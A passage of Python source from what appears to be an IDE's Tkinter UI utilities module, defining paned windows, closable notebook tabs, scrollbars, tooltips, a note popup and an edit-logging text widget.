            if getattr(pane, "preferred_size_in_pw", None) is not None:
                if self.cget("orient") == "horizontal":
                    current_size = pane.winfo_width()
                else:
                    current_size = pane.winfo_height()
                if current_size > 20:
                    pane.preferred_size_in_pw = current_size

                    # paneconfig width/height effectively puts
                    # unexplainable maxsize to some panes
                    # if self.cget("orient") == "horizontal":
                    #    self.paneconfig(pane, width=current_size)
                    # else:
                    #    self.paneconfig(pane, height=current_size)
                    #
            # else:
            #    self.paneconfig(pane, width=1000, height=1000)

    def _check_restore_preferred_sizes(self):
        """Restore sash positions from preferred sizes, unless still initializing."""
        window = self.winfo_toplevel()
        if getattr(window, "initializing", False):
            return

        try:
            self._restoring_pane_sizes = True
            self._restore_preferred_sizes()
        finally:
            self._restoring_pane_sizes = False

    def _restore_preferred_sizes(self):
        total_preferred_size = 0
        panes_without_preferred_size = []

        panes = self.pane_widgets()
        for pane in panes:
            if not hasattr(pane, "preferred_size_in_pw"):
                # child isn't fully constructed yet
                return

            if pane.preferred_size_in_pw is None:
                panes_without_preferred_size.append(pane)
                # self.paneconfig(pane, width=1000, height=1000)
            else:
                total_preferred_size += pane.preferred_size_in_pw

                # Without updating pane width/height attribute
                # the preferred size may lose effect when squeezing
                # non-preferred panes too small. Also zooming/unzooming
                # changes the supposedly fixed panes ...
                #
                # but
                # paneconfig width/height effectively puts
                # unexplainable maxsize to some panes
                # if self.cget("orient") == "horizontal":
                #    self.paneconfig(pane, width=pane.preferred_size_in_pw)
                # else:
                #    self.paneconfig(pane, height=pane.preferred_size_in_pw)

        assert len(panes_without_preferred_size) <= 1

        size = self._get_size()
        if size is None:
            return

        leftover_size = self._get_size() - total_preferred_size
        used_size = 0
        # Place sashes so that every pane with a preferred size gets it and
        # the single flexible pane absorbs the leftover space
        for i, pane in enumerate(panes[:-1]):
            used_size += pane.preferred_size_in_pw or leftover_size
            self._place_sash(i, used_size)
            used_size += int(str(self.cget("sashwidth")))

    def _get_size(self):
        """Current size along the paned axis, or None if not laid out yet."""
        if self.cget("orient") == tk.HORIZONTAL:
            result = self.winfo_width()
        else:
            result = self.winfo_height()

        if result < 20:
            # Not ready yet
            return None
        else:
            return result

    def _place_sash(self, i, distance):
        # Orientation decides which coordinate the distance applies to
        if self.cget("orient") == tk.HORIZONTAL:
            self.sash_place(i, distance, 0)
        else:
            self.sash_place(i, 0, distance)

    def _update_visibility(self):
        """Add/remove self from parent AutomaticPanedWindow as panes come and go."""
        if not isinstance(self.master, AutomaticPanedWindow):
            return

        if len(self.panes()) == 0 and self.is_visible():
            self.master.forget(self)

        if len(self.panes()) > 0 and not self.is_visible():
            self.master.insert("auto", self)

    def _update_appearance(self, event=None):
        self.configure(sashwidth=lookup_style_option("Sash", "sashthickness", 10))
        self.configure(background=lookup_style_option("TPanedWindow", "background"))
class ClosableNotebook(ttk.Notebook):
    """Notebook whose tabs have close buttons and a right-click menu
    (Close / Close others / Close all)."""

    def __init__(self, master, style="ButtonNotebook.TNotebook", **kw):
        super().__init__(master, style=style, **kw)

        self.tab_menu = self.create_tab_menu()
        self._popup_index = None  # index of the tab the context menu was opened on
        self.pressed_index = None  # index of the tab whose close button is pressed

        self.bind("<ButtonPress-1>", self._letf_btn_press, True)
        self.bind("<ButtonRelease-1>", self._left_btn_release, True)
        if running_on_mac_os():
            # Mac: right button is Button-2, and Ctrl+click also counts
            self.bind("<ButtonPress-2>", self._right_btn_press, True)
            self.bind("<Control-Button-1>", self._right_btn_press, True)
        else:
            self.bind("<ButtonPress-3>", self._right_btn_press, True)

        # self._check_update_style()

    def create_tab_menu(self):
        """Build the right-click context menu for tabs."""
        menu = tk.Menu(self.winfo_toplevel(), tearoff=False, **get_style_configuration("Menu"))
        menu.add_command(label=tr("Close"), command=self._close_tab_from_menu)
        menu.add_command(label=tr("Close others"), command=self._close_other_tabs)
        menu.add_command(label=tr("Close all"), command=self.close_tabs)
        return menu

    def _letf_btn_press(self, event):
        # NOTE(review): method name has a typo ("letf"); kept as-is since
        # renaming could affect subclasses binding/overriding it.
        try:
            elem = self.identify(event.x, event.y)
            index = self.index("@%d,%d" % (event.x, event.y))

            if "closebutton" in elem:
                self.state(["pressed"])
                self.pressed_index = index
        except Exception:
            # may fail, if clicked outside of tab
            return

    def _left_btn_release(self, event):
        if not self.instate(["pressed"]):
            return

        try:
            elem = self.identify(event.x, event.y)
            index = self.index("@%d,%d" % (event.x, event.y))
        except Exception:
            # may fail, when mouse is dragged
            return
        else:
            # Only close when released on the same close button that was pressed
            if "closebutton" in elem and self.pressed_index == index:
                self.close_tab(index)

            self.state(["!pressed"])
        finally:
            self.pressed_index = None

    def _right_btn_press(self, event):
        try:
            index = self.index("@%d,%d" % (event.x, event.y))
            self._popup_index = index
            self.tab_menu.tk_popup(*self.winfo_toplevel().winfo_pointerxy())
        except Exception:
            logging.exception("Opening tab menu")

    def _close_tab_from_menu(self):
        self.close_tab(self._popup_index)

    def _close_other_tabs(self):
        self.close_tabs(self._popup_index)

    def close_tabs(self, except_index=None):
        """Close all tabs, optionally keeping the one at except_index."""
        for tab_index in reversed(range(len(self.winfo_children()))):
            if except_index is not None and tab_index == except_index:
                continue
            else:
                self.close_tab(tab_index)

    def close_tab(self, index):
        # Let the child handle its own closing when it knows how
        child = self.get_child_by_index(index)
        if hasattr(child, "close"):
            child.close()
        else:
            self.forget(index)
            child.destroy()

    def get_child_by_index(self, index):
        tab_id = self.tabs()[index]
        if tab_id:
            return self.nametowidget(tab_id)
        else:
            return None

    def get_current_child(self):
        child_id = self.select()
        if child_id:
            return self.nametowidget(child_id)
        else:
            return None

    def focus_set(self):
        # Delegate focus to the selected child (e.g. the editor) when present
        editor = self.get_current_child()
        if editor:
            editor.focus_set()
        else:
            super().focus_set()

    def _check_update_style(self):
        """Create the closebutton ttk element and tab layout once per process."""
        style = ttk.Style()
        if "closebutton" in style.element_names():
            # It's done already
            return

        # respect if required images have been defined already
        if "img_close" not in self.image_names():
            img_dir = os.path.join(os.path.dirname(__file__), "res")
            # Keep references on the class to prevent garbage collection
            ClosableNotebook._close_img = tk.PhotoImage(
                "img_tab_close", file=os.path.join(img_dir, "tab_close.gif")
            )
            ClosableNotebook._close_active_img = tk.PhotoImage(
                "img_tab_close_active", file=os.path.join(img_dir, "tab_close_active.gif")
            )

        style.element_create(
            "closebutton",
            "image",
            "img_tab_close",
            ("active", "pressed", "!disabled", "img_tab_close_active"),
            ("active", "!disabled", "img_tab_close_active"),
            border=8,
            sticky="",
        )

        style.layout(
            "ButtonNotebook.TNotebook.Tab",
            [
                (
                    "Notebook.tab",
                    {
                        "sticky": "nswe",
                        "children": [
                            (
                                "Notebook.padding",
                                {
                                    "side": "top",
                                    "sticky": "nswe",
                                    "children": [
                                        (
                                            "Notebook.focus",
                                            {
                                                "side": "top",
                                                "sticky": "nswe",
                                                "children": [
                                                    (
                                                        "Notebook.label",
                                                        {"side": "left", "sticky": ""},
                                                    ),
                                                    (
                                                        "Notebook.closebutton",
                                                        {"side": "left", "sticky": ""},
                                                    ),
                                                ],
                                            },
                                        )
                                    ],
                                },
                            )
                        ],
                    },
                )
            ],
        )

    def _check_remove_padding(self, kw):
        # Windows themes produce 1-pixel padding to the bottom of the pane
        # Don't know how to get rid of it using themes
        if "padding" not in kw and ttk.Style().theme_use().lower() in (
            "windows",
            "xpnative",
            "vista",
        ):
            kw["padding"] = (0, 0, 0, -1)

    def add(self, child, **kw):
        self._check_remove_padding(kw)
        super().add(child, **kw)

    def insert(self, pos, child, **kw):
        self._check_remove_padding(kw)
        super().insert(pos, child, **kw)
class AutomaticNotebook(ClosableNotebook):
    """
    Enables inserting views according to their position keys.
    Remember its own position key. Automatically updates its visibility.
    """

    def __init__(self, master, position_key, preferred_size_in_pw=None):
        if get_workbench().in_simple_mode():
            style = "TNotebook"  # no close buttons in simple mode
        else:
            style = "ButtonNotebook.TNotebook"
        super().__init__(master, style=style, padding=0)
        self.position_key = position_key

        # should be in the end, so that it can be detected when
        # constructor hasn't completed yet
        self.preferred_size_in_pw = preferred_size_in_pw

    def add(self, child, **kw):
        super().add(child, **kw)
        self._update_visibility()

    def insert(self, pos, child, **kw):
        """Insert a tab; pos "auto" picks the slot from child.position_key."""
        if pos == "auto":
            for sibling in map(self.nametowidget, self.tabs()):
                if (
                    not hasattr(sibling, "position_key")
                    or sibling.position_key == None
                    or sibling.position_key > child.position_key
                ):
                    pos = sibling
                    break
            else:
                pos = "end"

        super().insert(pos, child, **kw)
        self._update_visibility()

    def hide(self, tab_id):
        super().hide(tab_id)
        self._update_visibility()

    def forget(self, tab_id):
        if tab_id in self.tabs() or tab_id in self.winfo_children():
            super().forget(tab_id)
        self._update_visibility()

    def is_visible(self):
        return self in self.master.pane_widgets()

    def get_visible_child(self):
        """Return the widget of the currently selected tab, or None."""
        for child in self.winfo_children():
            if str(child) == str(self.select()):
                return child

        return None

    def _update_visibility(self):
        """Add/remove self from parent AutomaticPanedWindow as tabs come and go."""
        if not isinstance(self.master, AutomaticPanedWindow):
            return

        if len(self.tabs()) == 0 and self.is_visible():
            self.master.remove(self)

        if len(self.tabs()) > 0 and not self.is_visible():
            self.master.insert("auto", self)
class TreeFrame(ttk.Frame):
    """Frame wrapping a ttk.Treeview with an optional vertical scrollbar
    and an optional statusbar row.  Subclasses override on_select /
    on_double_click for behavior."""

    def __init__(
        self,
        master,
        columns,
        displaycolumns="#all",
        show_scrollbar=True,
        show_statusbar=False,
        borderwidth=0,
        relief="flat",
        **tree_kw
    ):
        ttk.Frame.__init__(self, master, borderwidth=borderwidth, relief=relief)
        # http://wiki.tcl.tk/44444#pagetoc50f90d9a
        self.vert_scrollbar = ttk.Scrollbar(
            self, orient=tk.VERTICAL, style=scrollbar_style("Vertical")
        )
        if show_scrollbar:
            self.vert_scrollbar.grid(
                row=0, column=1, sticky=tk.NSEW, rowspan=2 if show_statusbar else 1
            )

        self.tree = ttk.Treeview(
            self,
            columns=columns,
            displaycolumns=displaycolumns,
            yscrollcommand=self.vert_scrollbar.set,
            **tree_kw
        )
        self.tree["show"] = "headings"  # hide the implicit first (#0) tree column
        self.tree.grid(row=0, column=0, sticky=tk.NSEW)
        self.vert_scrollbar["command"] = self.tree.yview
        self.columnconfigure(0, weight=1)
        self.rowconfigure(0, weight=1)
        self.tree.bind("<<TreeviewSelect>>", self.on_select, "+")
        self.tree.bind("<Double-Button-1>", self.on_double_click, "+")

        if show_statusbar:
            self.statusbar = ttk.Frame(self)
            self.statusbar.grid(row=1, column=0, sticky="nswe")
        else:
            self.statusbar = None

    def _clear_tree(self):
        for child_id in self.tree.get_children():
            self.tree.delete(child_id)

    def clear(self):
        self._clear_tree()

    def on_select(self, event):
        # hook for subclasses
        pass

    def on_double_click(self, event):
        # hook for subclasses
        pass
def scrollbar_style(orientation):
    """Return the ttk style name for scrollbars of the given orientation.

    In mac ttk.Scrollbar uses native rendering unless style attribute is set
    (see http://wiki.tcl.tk/44444#pagetoc50f90d9a) and native rendering
    doesn't look good in dark themes - so a custom style is used there.
    """
    needs_custom_style = running_on_mac_os() and get_workbench().uses_dark_ui_theme()
    return orientation + ".TScrollbar" if needs_custom_style else None
def sequence_to_accelerator(sequence):
    """Translate a Tk event sequence (e.g. "<Control-t>") into the customary
    shortcut notation used in menus (e.g. "Ctrl+T")."""
    if not sequence:
        return ""

    if not sequence.startswith("<"):
        # already a plain accelerator string
        return sequence

    raw = sequence.strip("<>")
    for old, new in (("Key-", ""), ("KeyPress-", ""), ("Control", "Ctrl")):
        raw = raw.replace(old, new)

    parts = raw.split("-")

    # tkinter shows shift with capital letter, but in shortcuts it's
    # customary to include it explicitly
    if len(parts[-1]) == 1 and parts[-1].isupper() and "Shift" not in parts:
        parts.insert(-1, "Shift")

    # even when shift is not required, it's customary to show the
    # shortcut with a capital letter
    if len(parts[-1]) == 1:
        parts[-1] = parts[-1].upper()

    result = "+".join(parts)

    # Post-process key names that Tk spells out
    for old, new in (("Minus", "-"), ("minus", "-"), ("Plus", "+"), ("plus", "+")):
        result = result.replace(old, new)

    return result
def get_zoomed(toplevel):
    """Return True if the toplevel window is maximized ("zoomed")."""
    if "-zoomed" in toplevel.wm_attributes():  # Linux
        return bool(toplevel.wm_attributes("-zoomed"))
    # Win/Mac
    return toplevel.wm_state() == "zoomed"
def set_zoomed(toplevel, value):
    """Maximize ("zoom") or restore the toplevel window, cross-platform."""
    if "-zoomed" in toplevel.wm_attributes():  # Linux
        toplevel.wm_attributes("-zoomed", str(int(value)))
    else:  # Win/Mac
        toplevel.wm_state("zoomed" if value else "normal")
class EnhancedTextWithLogging(tktextext.EnhancedText):
    """EnhancedText that reports every insertion/deletion to the workbench
    (as "TextInsert"/"TextDelete" events), together with hints about
    whether the edit may affect syntax coloring or paren matching.

    Bug fix: in ``_is_trivial_edit`` the ``"#"`` branch tested for the
    four-character string ``"''''"`` instead of a triple-quote ``"'''"``,
    so typing ``#`` on a line containing ``'''`` was wrongly classified
    as trivial for coloring.
    """

    def __init__(
        self,
        master=None,
        style="Text",
        tag_current_line=False,
        indent_with_tabs=False,
        replace_tabs=False,
        cnf={},
        **kw
    ):
        super().__init__(
            master=master,
            style=style,
            tag_current_line=tag_current_line,
            indent_with_tabs=indent_with_tabs,
            replace_tabs=replace_tabs,
            cnf=cnf,
            **kw
        )
        # True when the last insert/delete changed the number of lines
        self._last_event_changed_line_count = False

    def direct_insert(self, index, chars, tags=None, **kw):
        """Insert text and fire a "TextInsert" workbench event with triviality hints."""
        try:
            # try removing line numbers
            # TODO: shouldn't it take place only on paste?
            # TODO: does it occur when opening a file with line numbers in it?
            # if self._propose_remove_line_numbers and isinstance(chars, str):
            #    chars = try_remove_linenumbers(chars, self)
            concrete_index = self.index(index)
            line_before = self.get(concrete_index + " linestart", concrete_index + " lineend")
            self._last_event_changed_line_count = "\n" in chars
            return tktextext.EnhancedText.direct_insert(self, index, chars, tags=tags, **kw)
        finally:
            line_after = self.get(concrete_index + " linestart", concrete_index + " lineend")
            trivial_for_coloring, trivial_for_parens = self._is_trivial_edit(
                chars, line_before, line_after
            )
            get_workbench().event_generate(
                "TextInsert",
                index=concrete_index,
                text=chars,
                tags=tags,
                text_widget=self,
                trivial_for_coloring=trivial_for_coloring,
                trivial_for_parens=trivial_for_parens,
            )

    def direct_delete(self, index1, index2=None, **kw):
        """Delete text and fire a "TextDelete" workbench event with triviality hints."""
        try:
            # index1 may be eg "sel.first" and it doesn't make sense *after* deletion
            concrete_index1 = self.index(index1)
            if index2 is not None:
                concrete_index2 = self.index(index2)
            else:
                concrete_index2 = None

            chars = self.get(index1, index2)
            self._last_event_changed_line_count = "\n" in chars
            line_before = self.get(
                concrete_index1 + " linestart",
                (concrete_index1 if concrete_index2 is None else concrete_index2) + " lineend",
            )
            return tktextext.EnhancedText.direct_delete(self, index1, index2=index2, **kw)
        finally:
            line_after = self.get(
                concrete_index1 + " linestart",
                (concrete_index1 if concrete_index2 is None else concrete_index2) + " lineend",
            )
            trivial_for_coloring, trivial_for_parens = self._is_trivial_edit(
                chars, line_before, line_after
            )
            get_workbench().event_generate(
                "TextDelete",
                index1=concrete_index1,
                index2=concrete_index2,
                text_widget=self,
                trivial_for_coloring=trivial_for_coloring,
                trivial_for_parens=trivial_for_parens,
            )

    def _is_trivial_edit(self, chars, line_before, line_after):
        """Classify an edit: can it affect (a) syntax coloring, (b) paren matching?

        Returns a (trivial_for_coloring, trivial_for_parens) pair of bools.
        """
        # line is taken after edit for insertion and before edit for deletion
        if not chars.strip():
            # linebreaks, including with automatic indent
            # check it doesn't break a triple-quote
            trivial_for_coloring = line_before.count("'''") == line_after.count(
                "'''"
            ) and line_before.count('"""') == line_after.count('"""')
            trivial_for_parens = trivial_for_coloring
        elif len(chars) > 1:
            # paste, cut, load or something like this
            trivial_for_coloring = False
            trivial_for_parens = False
        elif chars == "#":
            # BUG FIX: was "''''" (four quotes), which never matched a
            # triple-quote and let such lines be treated as trivial
            trivial_for_coloring = "'''" not in line_before and '"""' not in line_before
            trivial_for_parens = trivial_for_coloring and not re.search(PARENS_REGEX, line_before)
        elif chars in "()[]{}":
            trivial_for_coloring = line_before.count("'''") == line_after.count(
                "'''"
            ) and line_before.count('"""') == line_after.count('"""')
            trivial_for_parens = False
        elif chars == "'":
            trivial_for_coloring = "'''" not in line_before and "'''" not in line_after
            trivial_for_parens = False  # can put parens into open string
        elif chars == '"':
            trivial_for_coloring = '"""' not in line_before and '"""' not in line_after
            trivial_for_parens = False  # can put parens into open string
        elif chars == "\\":
            # can shorten closing quote
            trivial_for_coloring = '"""' not in line_before and '"""' not in line_after
            trivial_for_parens = False
        else:
            trivial_for_coloring = line_before.count("'''") == line_after.count(
                "'''"
            ) and line_before.count('"""') == line_after.count('"""')
            trivial_for_parens = trivial_for_coloring

        return trivial_for_coloring, trivial_for_parens
class SafeScrollbar(ttk.Scrollbar):
    """Scrollbar whose ``set`` never raises - any exception is printed
    to stderr instead of propagating into Tk's callback machinery."""

    def __init__(self, master=None, **kw):
        super().__init__(master=master, **kw)

    def set(self, first, last):
        try:
            super().set(first, last)
        except Exception:
            traceback.print_exc()
class AutoScrollbar(SafeScrollbar):
    # http://effbot.org/zone/tkinter-autoscrollbar.htm
    # a vert_scrollbar that hides itself if it's not needed. only
    # works if you use the grid geometry manager.
    def __init__(self, master=None, **kw):
        super().__init__(master=master, **kw)

    def set(self, first, last):
        # Hide when the whole content is visible, show when clearly scrolled.
        # NOTE(review): the 0.009 upper threshold looks asymmetric (0.999
        # would mirror 0.001) - confirm against scrollbar wobble behavior.
        if float(first) <= 0.0 and float(last) >= 1.0:
            self.grid_remove()
        elif float(first) > 0.001 or float(last) < 0.009:
            # with >0 and <1 it occasionally made scrollbar wobble back and forth
            self.grid()
        ttk.Scrollbar.set(self, first, last)

    def pack(self, **kw):
        raise tk.TclError("cannot use pack with this widget")

    def place(self, **kw):
        raise tk.TclError("cannot use place with this widget")
def update_entry_text(entry, text):
    """Replace the content of *entry* with *text*, preserving its state.

    Works also for disabled/readonly entries: the widget is temporarily
    switched to "normal" for the edit.
    """
    saved_state = entry.cget("state")
    entry.config(state="normal")
    entry.delete(0, "end")
    entry.insert(0, text)
    entry.config(state=saved_state)
class VerticallyScrollableFrame(ttk.Frame):
    """Frame with a vertical scrollbar; put child widgets into `.interior`.

    Based on http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
    """

    def __init__(self, master):
        ttk.Frame.__init__(self, master)

        # set up scrolling with canvas
        vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
        self.canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)
        vscrollbar.config(command=self.canvas.yview)
        self.canvas.xview_moveto(0)
        self.canvas.yview_moveto(0)
        self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
        vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
        self.columnconfigure(0, weight=1)
        self.rowconfigure(0, weight=1)
        # actual content goes into this frame, embedded as a canvas window item
        self.interior = ttk.Frame(self.canvas)
        self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
        self.bind("<Configure>", self._configure_interior, "+")
        self.bind("<Expose>", self._expose, "+")

    def _expose(self, event):
        # sizes are only reliable after idle tasks have run
        self.update_idletasks()
        self.update_scrollbars()

    def _configure_interior(self, event):
        self.update_scrollbars()

    def update_scrollbars(self):
        # update the scrollbars to match the size of the inner frame
        size = (self.canvas.winfo_width(), self.interior.winfo_reqheight())
        self.canvas.config(scrollregion="0 0 %s %s" % size)
        if (
            self.interior.winfo_reqwidth() != self.canvas.winfo_width()
            and self.canvas.winfo_width() > 10
        ):
            # update the interior's width to fit canvas
            # print("CAWI", self.canvas.winfo_width())
            self.canvas.itemconfigure(self.interior_id, width=self.canvas.winfo_width())
class ScrollableFrame(ttk.Frame):
    """Frame scrollable in both directions; put child widgets into `.interior`.

    Based on http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
    """

    def __init__(self, master):
        ttk.Frame.__init__(self, master)

        # set up scrolling with canvas
        vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
        hscrollbar = ttk.Scrollbar(self, orient=tk.HORIZONTAL)
        # NB: xscrollcommand was previously missing, so the horizontal
        # scrollbar's thumb never reflected the canvas position even though
        # its command was wired to canvas.xview below.
        self.canvas = tk.Canvas(
            self,
            bd=0,
            highlightthickness=0,
            yscrollcommand=vscrollbar.set,
            xscrollcommand=hscrollbar.set,
        )
        vscrollbar.config(command=self.canvas.yview)
        hscrollbar.config(command=self.canvas.xview)
        self.canvas.xview_moveto(0)
        self.canvas.yview_moveto(0)
        self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
        vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
        hscrollbar.grid(row=1, column=0, sticky=tk.NSEW)
        self.columnconfigure(0, weight=1)
        self.rowconfigure(0, weight=1)
        # actual content goes into this frame, embedded as a canvas window item
        self.interior = ttk.Frame(self.canvas)
        self.interior.columnconfigure(0, weight=1)
        self.interior.rowconfigure(0, weight=1)
        self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
        self.bind("<Configure>", self._configure_interior, "+")
        self.bind("<Expose>", self._expose, "+")

    def _expose(self, event):
        # sizes are only reliable after idle tasks have run
        self.update_idletasks()
        self._configure_interior(event)

    def _configure_interior(self, event):
        # update the scrollbars to match the size of the inner frame
        size = (self.canvas.winfo_reqwidth(), self.interior.winfo_reqheight())
        self.canvas.config(scrollregion="0 0 %s %s" % size)
class ThemedListbox(tk.Listbox):
    """Plain tk.Listbox which re-reads its colors from the ttk style on theme change."""

    def __init__(self, master=None, cnf={}, **kw):
        super().__init__(master=master, cnf=cnf, **kw)

        self._ui_theme_change_binding = self.bind(
            "<<ThemeChanged>>", self._reload_theme_options, True
        )
        self._reload_theme_options()

    def _reload_theme_options(self, event=None):
        # copy the relevant option values from the ttk style onto this plain tk widget
        style = ttk.Style()

        states = []
        if self["state"] == "disabled":
            states.append("disabled")

        # Following crashes when a combobox is focused
        # if self.focus_get() == self:
        #    states.append("focus")
        opts = {}
        for key in [
            "background",
            "foreground",
            "highlightthickness",
            "highlightcolor",
            "highlightbackground",
        ]:
            value = style.lookup(self.get_style_name(), key, states)
            if value:
                opts[key] = value

        self.configure(opts)

    def get_style_name(self):
        # subclasses may override to pull options from another style
        return "Listbox"

    def destroy(self):
        # unbind first so a theme change during teardown can't call back
        self.unbind("<<ThemeChanged>>", self._ui_theme_change_binding)
        super().destroy()
class ToolTip:
    """Taken from http://www.voidspace.org.uk/python/weblog/arch_d7_2006_07_01.shtml"""

    def __init__(self, widget, options):
        # options: keyword arguments passed through to the tk.Label showing the text
        self.widget = widget
        self.tipwindow = None  # Toplevel while showing, None while hidden
        self.id = None
        self.x = self.y = 0
        self.options = options

    def showtip(self, text):
        "Display text in tooltip window"
        self.text = text
        if self.tipwindow or not self.text:
            # already visible, or nothing to show
            return
        # position the tip below the widget, near the insert cursor
        x, y, _, cy = self.widget.bbox("insert")
        x = x + self.widget.winfo_rootx() + 27
        y = y + cy + self.widget.winfo_rooty() + self.widget.winfo_height() + 2
        self.tipwindow = tw = tk.Toplevel(self.widget)
        if running_on_mac_os():
            try:
                # Must be the first thing to do after creating window
                # https://wiki.tcl-lang.org/page/MacWindowStyle
                tw.tk.call(
                    "::tk::unsupported::MacWindowStyle", "style", tw._w, "help", "noActivates"
                )
                if get_tk_version_info() >= (8, 6, 10) and running_on_mac_os():
                    tw.wm_overrideredirect(1)
            except tk.TclError:
                pass
        else:
            tw.wm_overrideredirect(1)

        tw.wm_geometry("+%d+%d" % (x, y))
        if running_on_mac_os():
            # TODO: maybe it's because of Tk 8.5, not because of Mac
            tw.wm_transient(self.widget)
        label = tk.Label(tw, text=self.text, **self.options)
        label.pack()
        # get_workbench().bind("WindowFocusOut", self.hidetip, True)

    def hidetip(self, event=None):
        tw = self.tipwindow
        self.tipwindow = None
        if tw:
            tw.destroy()
        # get_workbench().unbind("WindowFocusOut", self.hidetip)
def create_tooltip(widget, text, **kw):
    """Attach a hover tooltip with *text* to *widget*.

    Appearance comes from the "Tooltip" style configuration, topped up
    with sensible defaults; **kw overrides both.
    """
    options = get_style_configuration("Tooltip").copy()
    for key, fallback in [
        ("background", "#ffffe0"),
        ("relief", "solid"),
        ("borderwidth", 1),
        ("padx", 1),
        ("pady", 0),
    ]:
        options.setdefault(key, fallback)
    options.update(kw)

    tooltip = ToolTip(widget, options)
    widget.bind("<Enter>", lambda event: tooltip.showtip(text))
    widget.bind("<Leave>", lambda event: tooltip.hidetip())
class NoteBox(CommonDialog):
    """Borderless tooltip-like popup for showing rich, possibly clickable notes.

    Content is rendered in a read-only TweakableText; content pieces may
    carry text tags and click handlers (see set_content / append_text).
    The window stays withdrawn until place()/show_note() is called.
    """

    def __init__(self, master=None, max_default_width=300, **kw):
        super().__init__(master=master, highlightthickness=0, **kw)
        # max_default_width: cap for the computed note width, in pixels
        self._max_default_width = max_default_width

        self.wm_overrideredirect(True)
        if running_on_mac_os():
            # TODO: maybe it's because of Tk 8.5, not because of Mac
            self.wm_transient(master)
        try:
            # For Mac OS
            self.tk.call(
                "::tk::unsupported::MacWindowStyle", "style", self._w, "help", "noActivates"
            )
        except tk.TclError:
            pass

        self._current_chars = ""  # plain-text mirror of the displayed content
        self._click_bindings = {}  # click tag name -> Tk binding id

        self.padx = 5
        self.pady = 5
        self.text = TweakableText(
            self,
            background="#ffffe0",
            borderwidth=1,
            relief="solid",
            undo=False,
            read_only=True,
            font="TkDefaultFont",
            highlightthickness=0,
            padx=self.padx,
            pady=self.pady,
            wrap="word",
        )
        self.text.grid(row=0, column=0, sticky="nsew")
        self.columnconfigure(0, weight=1)
        self.rowconfigure(0, weight=1)

        self.text.bind("<Escape>", self.close, True)

        # tk._default_root.bind_all("<1>", self._close_maybe, True)
        # tk._default_root.bind_all("<Key>", self.close, True)

        self.withdraw()

    def clear(self):
        """Remove all content and unregister the click bindings."""
        for tag in self._click_bindings:
            self.text.tag_unbind(tag, "<1>", self._click_bindings[tag])
            self.text.tag_remove(tag, "1.0", "end")
        self.text.direct_delete("1.0", "end")
        self._current_chars = ""
        self._click_bindings.clear()

    def set_content(self, *items):
        """Replace content.

        Each item is either a plain string or a (chars, *tags[, click_handler])
        list/tuple -- a trailing callable is treated as the click handler.
        """
        self.clear()

        for item in items:
            if isinstance(item, str):
                self.text.direct_insert("1.0", item)
                self._current_chars = item
            else:
                assert isinstance(item, (list, tuple))
                chars, *props = item
                if len(props) > 0 and callable(props[-1]):
                    tags = tuple(props[:-1])
                    click_handler = props[-1]
                else:
                    tags = tuple(props)
                    click_handler = None
                self.append_text(chars, tags, click_handler)

        self.text.see("1.0")

    def append_text(self, chars, tags=(), click_handler=None):
        """Append *chars* with *tags*; optionally make them clickable."""
        tags = tuple(tags)

        if click_handler is not None:
            # unique tag per clickable span, so each span keeps its own handler
            click_tag = "click_%d" % len(self._click_bindings)
            tags = tags + (click_tag,)
            binding = self.text.tag_bind(click_tag, "<1>", click_handler, True)
            self._click_bindings[click_tag] = binding

        self.text.direct_insert("end", chars, tags)
        self._current_chars += chars

    def place(self, target, focus=None):
        """Show the note just below *target* (or below the *focus* area within it).

        focus may be a TextRange (when target is a tk.Text), an
        (x, y, width, height) sequence relative to target, or None.
        """

        # Compute the area that will be described by this Note
        focus_x = target.winfo_rootx()
        focus_y = target.winfo_rooty()
        focus_height = target.winfo_height()

        if isinstance(focus, TextRange):
            assert isinstance(target, tk.Text)
            topleft = target.bbox("%d.%d" % (focus.lineno, focus.col_offset))
            if focus.end_col_offset == 0:
                # range ends at a line start -- use the end of the previous line
                botright = target.bbox(
                    "%d.%d lineend" % (focus.end_lineno - 1, focus.end_lineno - 1)
                )
            else:
                botright = target.bbox("%d.%d" % (focus.end_lineno, focus.end_col_offset))

            if topleft and botright:
                focus_x += topleft[0]
                focus_y += topleft[1]
                focus_height = botright[1] - topleft[1] + botright[3]

        elif isinstance(focus, (list, tuple)):
            focus_x += focus[0]
            focus_y += focus[1]
            focus_height = focus[3]

        elif focus is None:
            pass

        else:
            raise TypeError("Unsupported focus")

        # Compute dimensions of the note
        font = self.text["font"]
        if isinstance(font, str):
            font = tk.font.nametofont(font)

        lines = self._current_chars.splitlines()
        max_line_width = 0
        for line in lines:
            max_line_width = max(max_line_width, font.measure(line))

        width = min(max_line_width, self._max_default_width) + self.padx * 2 + 2
        # first set a preliminary geometry so the text can compute its line count
        self.wm_geometry("%dx%d+%d+%d" % (width, 100, focus_x, focus_y + focus_height))
        self.update_idletasks()
        line_count = int(float(self.text.index("end")))
        line_height = font.metrics()["linespace"]

        self.wm_geometry(
            "%dx%d+%d+%d" % (width, line_count * line_height, focus_x, focus_y + focus_height)
        )

        # TODO: detect the situation when note doesn't fit under
        # the focus box and should be placed above

        self.deiconify()

    def show_note(self, *content_items: Union[str, List], target=None, focus=None) -> None:
        """Set content and display the note near target/focus."""
        self.set_content(*content_items)
        self.place(target, focus)

    def _close_maybe(self, event):
        # close when clicking anywhere outside the note
        if event.widget not in [self, self.text]:
            self.close(event)

    def close(self, event=None):
        self.withdraw()
def get_widget_offset_from_toplevel(widget):
    """Return (x, y) position of *widget* relative to its toplevel window.

    Sums the offsets of all intermediate parents.
    """
    toplevel = widget.winfo_toplevel()
    offset_x = 0
    offset_y = 0
    current = widget
    while current != toplevel:
        offset_x += current.winfo_x()
        offset_y += current.winfo_y()
        current = current.master
    return offset_x, offset_y
class EnhancedVar(tk.Variable):
    """tk.Variable which knows whether it has been written after creation.

    `modified` becomes True on the first write; *modification_listener*
    (when given) is invoked after every write.
    """

    def __init__(self, master=None, value=None, name=None, modification_listener=None):
